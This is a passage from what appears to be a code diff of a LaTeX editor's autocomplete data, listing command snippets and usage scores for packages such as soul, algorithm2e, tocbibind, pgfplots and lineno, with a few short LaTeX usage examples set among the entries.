}, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'csquotes-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'csquotes-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'csquotes-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'csquotes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'csquotes-cmd', + score: 0.00037306820619479756, + }, + ], + xparse: [ + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'xparse-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'xparse-cmd', + score: 0.2864294797053033, + }, + ], + soul: [ + { + caption: '\\DeclareRobustCommand{}{}', + snippet: '\\DeclareRobustCommand{$1}{$2}', + meta: 'soul-cmd', + score: 0.0010373158471650705, + }, + { + caption: '\\DeclareRobustCommand{}[]{}', + snippet: '\\DeclareRobustCommand{$1}[$2]{$3}', + meta: 'soul-cmd', + score: 0.0010373158471650705, + }, + { + caption: '\\sethlcolor{}', + snippet: '\\sethlcolor{$1}', + meta: 'soul-cmd', + score: 0.01970230898277056, + }, + { + caption: '\\st', + snippet: '\\st', + meta: 'soul-cmd', + score: 0.004652662833362787, + }, + { + caption: '\\st{}', + snippet: '\\st{$1}', + meta: 'soul-cmd', + score: 0.004652662833362787, + }, + { + caption: '\\def', + snippet: '\\def', + meta: 'soul-cmd', + score: 0.21357759092476175, + }, + { + caption: '\\hl{}', + snippet: '\\hl{$1}', + meta: 'soul-cmd', + score: 0.03421486301062431, + }, + { + caption: '\\sodef', + snippet: '\\sodef', + meta: 'soul-cmd', + score: 0.0017045357696831268, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'soul-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\so', + snippet: '\\so', + meta: 'soul-cmd', + score: 0.004308800134587786, + }, + { + caption: '\\so{}', + snippet: '\\so{$1}', + meta: 'soul-cmd', + score: 0.004308800134587786, + }, + ], + comment: [ + { + caption: '\\specialcomment{}{}{}', + snippet: '\\specialcomment{$1}{$2}{$3}', + meta: 'comment-cmd', + score: 9.120209837787948e-5, + }, + { + caption: '\\includecomment{}', + snippet: '\\includecomment{$1}', + meta: 'comment-cmd', + score: 8.21804444236254e-5, + }, + ], + algorithm2e: [ + { + caption: '\\FuncSty{}', + snippet: '\\FuncSty{$1}', + meta: 'algorithm2e-cmd', + score: 7.576875738934807e-5, + }, + { + caption: '\\algorithmautorefname', + snippet: '\\algorithmautorefname', + meta: 'algorithm2e-cmd', + score: 2.0085955839419213e-5, + }, + { + caption: '\\SetAlgoNoLine', + snippet: '\\SetAlgoNoLine', + meta: 'algorithm2e-cmd', + score: 0.00015722499147840545, + }, + { + caption: '\\Indp', + snippet: '\\Indp', + meta: 'algorithm2e-cmd', + score: 6.068942580823901e-5, + }, + { + caption: '\\AlCapFnt', + snippet: '\\AlCapFnt', + meta: 'algorithm2e-cmd', + score: 3.0307502955739227e-5, + }, + { + caption: '\\LinesNumbered', + snippet: '\\LinesNumbered', + meta: 'algorithm2e-cmd', + score: 0.000162125616653719, + }, + { + caption: '\\SetAlFnt{}', + snippet: '\\SetAlFnt{$1}', + meta: 'algorithm2e-cmd', + score: 0.0024446198714390757, + }, + { + caption: '\\SetKw{}{}', + snippet: '\\SetKw{$1}{$2}', + meta: 'algorithm2e-cmd', + score: 9.292434841280213e-5, + }, + { + caption: '\\RestyleAlgo{}', + snippet: '\\RestyleAlgo{$1}', + meta: 'algorithm2e-cmd', + 
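
The csquotes block above mixes its public interface (\enquote{}, \MakeOuterQuote{}, \blockquote{}) with etoolbox internals it loads, and soul's highlighting commands sit alongside it. A minimal sketch of the public commands, assuming xcolor supplies the highlight color:

    \documentclass{article}
    \usepackage{xcolor}
    \usepackage[autostyle]{csquotes}
    \usepackage{soul}
    \MakeOuterQuote{"}   % catalogued: \MakeOuterQuote{}
    \sethlcolor{yellow}  % catalogued: \sethlcolor{}
    \begin{document}
    \enquote{outer \enquote{inner} quotes nest correctly}  % catalogued: \enquote{}
    "plain quotes are converted too", and \hl{this phrase is highlighted}.
    \end{document}
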
score: 0.00019243311960945823, + }, + { + caption: '\\listofalgorithms', + snippet: '\\listofalgorithms', + meta: 'algorithm2e-cmd', + score: 0.0012576983422794912, + }, + { + caption: '\\IncMargin{}', + snippet: '\\IncMargin{$1}', + meta: 'algorithm2e-cmd', + score: 0.0024294661199612063, + }, + { + caption: '\\BlankLine', + snippet: '\\BlankLine', + meta: 'algorithm2e-cmd', + score: 0.005049617303688214, + }, + { + caption: '\\SetCommentSty{}', + snippet: '\\SetCommentSty{$1}', + meta: 'algorithm2e-cmd', + score: 0.0001778112853266571, + }, + { + caption: '\\SetAlgoNoEnd', + snippet: '\\SetAlgoNoEnd', + meta: 'algorithm2e-cmd', + score: 0.00015722499147840545, + }, + { + caption: '\\theAlgoLine{}', + snippet: '\\theAlgoLine{$1}', + meta: 'algorithm2e-cmd', + score: 1.5153751477869614e-5, + }, + { + caption: '\\SetKwBlock{}{}{}', + snippet: '\\SetKwBlock{$1}{$2}{$3}', + meta: 'algorithm2e-cmd', + score: 0.000981463850523159, + }, + { + caption: '\\SetKwBlock{}{}', + snippet: '\\SetKwBlock{$1}{$2}', + meta: 'algorithm2e-cmd', + score: 0.000981463850523159, + }, + { + caption: '\\AlCapNameFnt', + snippet: '\\AlCapNameFnt', + meta: 'algorithm2e-cmd', + score: 3.0307502955739227e-5, + }, + { + caption: '\\SetAlgoSkip{}', + snippet: '\\SetAlgoSkip{$1}', + meta: 'algorithm2e-cmd', + score: 0.00017454032258926576, + }, + { + caption: '\\SetKwFunction{}{}', + snippet: '\\SetKwFunction{$1}{$2}', + meta: 'algorithm2e-cmd', + score: 0.0015332307832994817, + }, + { + caption: '\\nllabel{}', + snippet: '\\nllabel{$1}', + meta: 'algorithm2e-cmd', + score: 0.0001844460347791443, + }, + { + caption: '\\SetAlgoInsideSkip{}', + snippet: '\\SetAlgoInsideSkip{$1}', + meta: 'algorithm2e-cmd', + score: 4.5812360816321294e-5, + }, + { + caption: '\\DataSty{}', + snippet: '\\DataSty{$1}', + meta: 'algorithm2e-cmd', + score: 1.5153751477869614e-5, + }, + { + caption: '\\SetKwInOut{}{}', + snippet: '\\SetKwInOut{$1}{$2}', + meta: 'algorithm2e-cmd', + score: 0.0017021978326807814, + }, + { + caption: '\\SetAlCapFnt{}', + snippet: '\\SetAlCapFnt{$1}', + meta: 'algorithm2e-cmd', + score: 0.0024294661199612063, + }, + { + caption: '\\CommentSty{}', + snippet: '\\CommentSty{$1}', + meta: 'algorithm2e-cmd', + score: 0.0001111448631633176, + }, + { + caption: '\\SetAlCapHSkip{}', + snippet: '\\SetAlCapHSkip{$1}', + meta: 'algorithm2e-cmd', + score: 0.0024294661199612063, + }, + { + caption: '\\renewcommand{}{}', + snippet: '\\renewcommand{$1}{$2}', + meta: 'algorithm2e-cmd', + score: 0.3267437011085663, + }, + { + caption: '\\renewcommand', + snippet: '\\renewcommand', + meta: 'algorithm2e-cmd', + score: 0.3267437011085663, + }, + { + caption: '\\algorithmcfname', + snippet: '\\algorithmcfname', + meta: 'algorithm2e-cmd', + score: 0.0024445413067013134, + }, + { + caption: '\\SetKwIF{}{}{}{}{}{}{}{}', + snippet: '\\SetKwIF{$1}{$2}{$3}{$4}{$5}{$6}{$7}{$8}', + meta: 'algorithm2e-cmd', + score: 1.5153751477869614e-5, + }, + { + caption: '\\SetAlgoCaptionSeparator{}', + snippet: '\\SetAlgoCaptionSeparator{$1}', + meta: 'algorithm2e-cmd', + score: 1.5153751477869614e-5, + }, + { + caption: '\\AlCapSty{}', + snippet: '\\AlCapSty{$1}', + meta: 'algorithm2e-cmd', + score: 3.0307502955739227e-5, + }, + { + caption: '\\ArgSty{}', + snippet: '\\ArgSty{$1}', + meta: 'algorithm2e-cmd', + score: 3.0307502955739227e-5, + }, + { + caption: '\\AlCapNameSty{}', + snippet: '\\AlCapNameSty{$1}', + meta: 'algorithm2e-cmd', + score: 3.0307502955739227e-5, + }, + { + caption: '\\SetKwData{}{}', + snippet: '\\SetKwData{$1}{$2}', + meta: 
'algorithm2e-cmd', + score: 0.00235652682860263, + }, + { + caption: '\\listalgorithmcfname', + snippet: '\\listalgorithmcfname', + meta: 'algorithm2e-cmd', + score: 1.5075186740106946e-5, + }, + { + caption: '\\Indm', + snippet: '\\Indm', + meta: 'algorithm2e-cmd', + score: 6.068942580823901e-5, + }, + { + caption: '\\SetAlCapNameFnt{}', + snippet: '\\SetAlCapNameFnt{$1}', + meta: 'algorithm2e-cmd', + score: 0.0024294661199612063, + }, + { + caption: '\\DontPrintSemicolon', + snippet: '\\DontPrintSemicolon', + meta: 'algorithm2e-cmd', + score: 0.001062087490197768, + }, + { + caption: '\\SetAlgoLined', + snippet: '\\SetAlgoLined', + meta: 'algorithm2e-cmd', + score: 0.0017151361342403852, + }, + { + caption: '\\SetAlCapSkip{}', + snippet: '\\SetAlCapSkip{$1}', + meta: 'algorithm2e-cmd', + score: 0.0006213942502400296, + }, + { + caption: '\\LinesNotNumbered', + snippet: '\\LinesNotNumbered', + meta: 'algorithm2e-cmd', + score: 1.5153751477869614e-5, + }, + { + caption: '\\SetKwProg{}{}{}{}', + snippet: '\\SetKwProg{$1}{$2}{$3}{$4}', + meta: 'algorithm2e-cmd', + score: 0.0008518783278391971, + }, + { + caption: '\\SetAlgoVlined', + snippet: '\\SetAlgoVlined', + meta: 'algorithm2e-cmd', + score: 1.5153751477869614e-5, + }, + { + caption: '\\SetKwRepeat{}{}{}', + snippet: '\\SetKwRepeat{$1}{$2}{$3}', + meta: 'algorithm2e-cmd', + score: 6.110202388233705e-5, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'algorithm2e-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\chapter{}', + snippet: '\\chapter{$1}', + meta: 'algorithm2e-cmd', + score: 0.422097569591803, + }, + { + caption: '\\SetKwFor{}{}{}{}', + snippet: '\\SetKwFor{$1}{$2}{$3}{$4}', + meta: 'algorithm2e-cmd', + score: 0.00010699539949594301, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'algorithm2e-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'algorithm2e-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'algorithm2e-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'algorithm2e-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'algorithm2e-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'algorithm2e-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\xspace', + snippet: '\\xspace', + meta: 'algorithm2e-cmd', + score: 0.07560370351316588, + }, + ], + tocbibind: [ + { + caption: '\\contentsname', + snippet: '\\contentsname', + meta: 'tocbibind-cmd', + score: 0.010205180337548728, + }, + { + caption: '\\contentsname{}', + snippet: '\\contentsname{$1}', + meta: 'tocbibind-cmd', + score: 0.010205180337548728, + }, + { + caption: '\\tocchapter', + snippet: '\\tocchapter', + meta: 'tocbibind-cmd', + score: 0.00016023188758771694, + }, + { + caption: '\\indexname', + snippet: '\\indexname', + meta: 'tocbibind-cmd', + score: 0.0007544109314450072, + }, + { + caption: '\\listoffigures', + snippet: '\\listoffigures', + meta: 'tocbibind-cmd', + score: 0.03447318897846567, + }, + { + caption: '\\tocfile{}{}', + snippet: '\\tocfile{$1}{$2}', + meta: 'tocbibind-cmd', + score: 0.00016023188758771694, + }, + { + caption: '\\tocbibname', + snippet: '\\tocbibname', + meta: 'tocbibind-cmd', + score: 0.0020762574479507175, + }, + { + caption: '\\settocbibname{}', + 
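
algorithm2e's completions above are dominated by its \SetKw... configuration family. A minimal sketch of an actual algorithm using \DontPrintSemicolon and \SetKwInOut{}{} from the list:

    \documentclass{article}
    \usepackage[ruled,vlined]{algorithm2e}
    \begin{document}
    \begin{algorithm}
      \DontPrintSemicolon                             % catalogued above
      \SetKwInOut{Input}{in}\SetKwInOut{Output}{out}  % catalogued: \SetKwInOut{}{}
      \Input{numbers $a_1,\dots,a_n$}
      \Output{their maximum}
      $m \gets a_1$\;
      \For{$i \gets 2$ \KwTo $n$}{
        \If{$a_i > m$}{$m \gets a_i$\;}
      }
      \KwRet{$m$}\;
      \caption{Running maximum}
    \end{algorithm}
    \end{document}
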
snippet: '\\settocbibname{$1}', + meta: 'tocbibind-cmd', + score: 0.00010668677119599426, + }, + { + caption: '\\listoftables', + snippet: '\\listoftables', + meta: 'tocbibind-cmd', + score: 0.02104656820469027, + }, + { + caption: '\\tableofcontents', + snippet: '\\tableofcontents', + meta: 'tocbibind-cmd', + score: 0.13360595130994957, + }, + { + caption: '\\listfigurename', + snippet: '\\listfigurename', + meta: 'tocbibind-cmd', + score: 0.0034407237779350256, + }, + ], + pgfplots: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgfplots-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfplots-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfplots-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfplots-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfplots-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfplots-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfplots-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgfplots-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgfplots-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgfplots-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgfplots-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgfplots-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfplots-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgfplots-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfplots-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgfplots-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfplots-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfplots-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfplots-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgfplots-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgfplots-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfplots-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfplots-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgfplots-cmd', + score: 0.00926923425734719, + 
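
tocbibind's completions above are the front-matter names and lists it adds to the table of contents. A minimal sketch; the nottoc option keeps the contents listing itself out of the ToC:

    \documentclass{report}
    \usepackage[nottoc]{tocbibind}
    \begin{document}
    \tableofcontents  % catalogued: \tableofcontents
    \listoffigures    % catalogued: \listoffigures
    \listoftables     % catalogued: \listoftables
    \chapter{Introduction}
    Body text.
    \end{document}
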
}, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgfplots-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgfplots-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgfplots-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgfplots-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfplots-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgfplots-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgfplots-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfplots-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgfplots-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgfplots-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgfplots-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgfplots-cmd', + score: 0.2864294797053033, + }, + ], + lastpage: [ + { + caption: '\\string', + snippet: '\\string', + meta: 'lastpage-cmd', + score: 0.001042697111754002, + }, + ], + graphics: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'graphics-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'graphics-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'graphics-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'graphics-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'graphics-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'graphics-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'graphics-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'graphics-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'graphics-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'graphics-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'graphics-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'graphics-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'graphics-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'graphics-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'graphics-cmd', + score: 
0.004649150613625593, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'graphics-cmd', + score: 0.008565354665444157, + }, + ], + algorithmic: [ + { + caption: '\\REPEAT', + snippet: '\\REPEAT', + meta: 'algorithmic-cmd', + score: 0.0004816110638193742, + }, + { + caption: '\\ENDIF', + snippet: '\\ENDIF', + meta: 'algorithmic-cmd', + score: 0.003585213685098552, + }, + { + caption: '\\algorithmicwhile', + snippet: '\\algorithmicwhile', + meta: 'algorithmic-cmd', + score: 0.0005769483780443573, + }, + { + caption: '\\algorithmicwhile{}', + snippet: '\\algorithmicwhile{$1}', + meta: 'algorithmic-cmd', + score: 0.0005769483780443573, + }, + { + caption: '\\FOR{}', + snippet: '\\FOR{$1}', + meta: 'algorithmic-cmd', + score: 0.004074774218819945, + }, + { + caption: '\\algorithmicif', + snippet: '\\algorithmicif', + meta: 'algorithmic-cmd', + score: 0.00039654130753044966, + }, + { + caption: '\\algorithmicif{}', + snippet: '\\algorithmicif{$1}', + meta: 'algorithmic-cmd', + score: 0.00039654130753044966, + }, + { + caption: '\\ENDFOR', + snippet: '\\ENDFOR', + meta: 'algorithmic-cmd', + score: 0.004428141530092572, + }, + { + caption: '\\UNTIL', + snippet: '\\UNTIL', + meta: 'algorithmic-cmd', + score: 0.0004816110638193742, + }, + { + caption: '\\UNTIL{}', + snippet: '\\UNTIL{$1}', + meta: 'algorithmic-cmd', + score: 0.0004816110638193742, + }, + { + caption: '\\IF{}', + snippet: '\\IF{$1}', + meta: 'algorithmic-cmd', + score: 0.0036985887706967417, + }, + { + caption: '\\ENSURE', + snippet: '\\ENSURE', + meta: 'algorithmic-cmd', + score: 0.0013188761425395954, + }, + { + caption: '\\algorithmiccomment', + snippet: '\\algorithmiccomment', + meta: 'algorithmic-cmd', + score: 0.00021737766481978388, + }, + { + caption: '\\ENDWHILE', + snippet: '\\ENDWHILE', + meta: 'algorithmic-cmd', + score: 0.00047037943460091465, + }, + { + caption: '\\algorithmicend', + snippet: '\\algorithmicend', + meta: 'algorithmic-cmd', + score: 0.0011128218085672747, + }, + { + caption: '\\algorithmicend{}', + snippet: '\\algorithmicend{$1}', + meta: 'algorithmic-cmd', + score: 0.0011128218085672747, + }, + { + caption: '\\algorithmicrequire', + snippet: '\\algorithmicrequire', + meta: 'algorithmic-cmd', + score: 0.004751598472180266, + }, + { + caption: '\\algorithmicdo', + snippet: '\\algorithmicdo', + meta: 'algorithmic-cmd', + score: 0.0005655570358533174, + }, + { + caption: '\\algorithmicdo{}', + snippet: '\\algorithmicdo{$1}', + meta: 'algorithmic-cmd', + score: 0.0005655570358533174, + }, + { + caption: '\\algorithmicfor', + snippet: '\\algorithmicfor', + meta: 'algorithmic-cmd', + score: 0.0005681785898943757, + }, + { + caption: '\\algorithmicfor{}', + snippet: '\\algorithmicfor{$1}', + meta: 'algorithmic-cmd', + score: 0.0005681785898943757, + }, + { + caption: '\\RETURN', + snippet: '\\RETURN', + meta: 'algorithmic-cmd', + score: 0.0013054907995767408, + }, + { + caption: '\\algorithmicand', + snippet: '\\algorithmicand', + meta: 'algorithmic-cmd', + score: 5.326674280259771e-5, + }, + { + caption: '\\algsetup{}', + snippet: '\\algsetup{$1}', + meta: 'algorithmic-cmd', + score: 0.00012872796177294446, + }, + { + caption: '\\algorithmicreturn{}', + snippet: '\\algorithmicreturn{$1}', + meta: 'algorithmic-cmd', + score: 0.00022490402516652368, + }, + { + caption: '\\algorithmicreturn', + snippet: '\\algorithmicreturn', + meta: 'algorithmic-cmd', + score: 0.00022490402516652368, + }, + { + caption: '\\algorithmicforall{}', + snippet: '\\algorithmicforall{$1}', + meta: 'algorithmic-cmd', + score: 
0.00022490402516652368, + }, + { + caption: '\\algorithmicforall', + snippet: '\\algorithmicforall', + meta: 'algorithmic-cmd', + score: 0.00022490402516652368, + }, + { + caption: '\\COMMENT', + snippet: '\\COMMENT', + meta: 'algorithmic-cmd', + score: 0.00025669572555354604, + }, + { + caption: '\\COMMENT{}', + snippet: '\\COMMENT{$1}', + meta: 'algorithmic-cmd', + score: 0.00025669572555354604, + }, + { + caption: '\\REQUIRE', + snippet: '\\REQUIRE', + meta: 'algorithmic-cmd', + score: 0.001870681168192269, + }, + { + caption: '\\algorithmicor', + snippet: '\\algorithmicor', + meta: 'algorithmic-cmd', + score: 5.326674280259771e-5, + }, + { + caption: '\\ELSE', + snippet: '\\ELSE', + meta: 'algorithmic-cmd', + score: 0.0007599864146830139, + }, + { + caption: '\\STATE', + snippet: '\\STATE', + meta: 'algorithmic-cmd', + score: 0.0266684860947573, + }, + { + caption: '\\WHILE{}', + snippet: '\\WHILE{$1}', + meta: 'algorithmic-cmd', + score: 0.00047037943460091465, + }, + { + caption: '\\ELSIF{}', + snippet: '\\ELSIF{$1}', + meta: 'algorithmic-cmd', + score: 0.0001991613148371481, + }, + { + caption: '\\FALSE', + snippet: '\\FALSE', + meta: 'algorithmic-cmd', + score: 3.34222699937868e-5, + }, + { + caption: '\\AND', + snippet: '\\AND', + meta: 'algorithmic-cmd', + score: 6.401730289932545e-5, + }, + { + caption: '\\algorithmicensure', + snippet: '\\algorithmicensure', + meta: 'algorithmic-cmd', + score: 0.003439482525198322, + }, + { + caption: '\\OR', + snippet: '\\OR', + meta: 'algorithmic-cmd', + score: 6.401730289932545e-5, + }, + { + caption: '\\algorithmicrepeat', + snippet: '\\algorithmicrepeat', + meta: 'algorithmic-cmd', + score: 5.326674280259771e-5, + }, + { + caption: '\\TRUE', + snippet: '\\TRUE', + meta: 'algorithmic-cmd', + score: 0.0001336890799751472, + }, + { + caption: '\\FORALL{}', + snippet: '\\FORALL{$1}', + meta: 'algorithmic-cmd', + score: 0.0003533673112726266, + }, + { + caption: '\\algorithmicthen{}', + snippet: '\\algorithmicthen{$1}', + meta: 'algorithmic-cmd', + score: 0.00032476571672371697, + }, + { + caption: '\\algorithmicthen', + snippet: '\\algorithmicthen', + meta: 'algorithmic-cmd', + score: 0.00032476571672371697, + }, + { + caption: '\\algorithmicuntil', + snippet: '\\algorithmicuntil', + meta: 'algorithmic-cmd', + score: 5.326674280259771e-5, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'algorithmic-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'algorithmic-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'algorithmic-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'algorithmic-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'algorithmic-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'algorithmic-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'algorithmic-cmd', + score: 0.00037306820619479756, + }, + ], + lineno: [ + { + caption: '\\pagewiselinenumbers', + snippet: '\\pagewiselinenumbers', + meta: 'lineno-cmd', + score: 0.00016870831850106035, + }, + { + caption: '\\linenomath', + snippet: '\\linenomath', + meta: 'lineno-cmd', + score: 1.4517338420208715e-5, + }, + { + caption: '\\linenumberfont{}', + snippet: 
'\\linenumberfont{$1}', + meta: 'lineno-cmd', + score: 0.0001811784338695797, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'lineno-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'lineno-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\endlinenomath', + snippet: '\\endlinenomath', + meta: 'lineno-cmd', + score: 1.4517338420208715e-5, + }, + { + caption: '\\nolinenumbers', + snippet: '\\nolinenumbers', + meta: 'lineno-cmd', + score: 0.0009805246614299932, + }, + { + caption: '\\path', + snippet: '\\path', + meta: 'lineno-cmd', + score: 0.028200474217322108, + }, + { + caption: '\\path[]', + snippet: '\\path[$1]', + meta: 'lineno-cmd', + score: 0.028200474217322108, + }, + { + caption: '\\path{}', + snippet: '\\path{$1}', + meta: 'lineno-cmd', + score: 0.028200474217322108, + }, + { + caption: '\\filedate{}', + snippet: '\\filedate{$1}', + meta: 'lineno-cmd', + score: 0.000578146635331119, + }, + { + caption: '\\filedate', + snippet: '\\filedate', + meta: 'lineno-cmd', + score: 0.000578146635331119, + }, + { + caption: '\\linenumbers', + snippet: '\\linenumbers', + meta: 'lineno-cmd', + score: 0.004687680659497865, + }, + { + caption: '\\modulolinenumbers[]', + snippet: '\\modulolinenumbers[$1]', + meta: 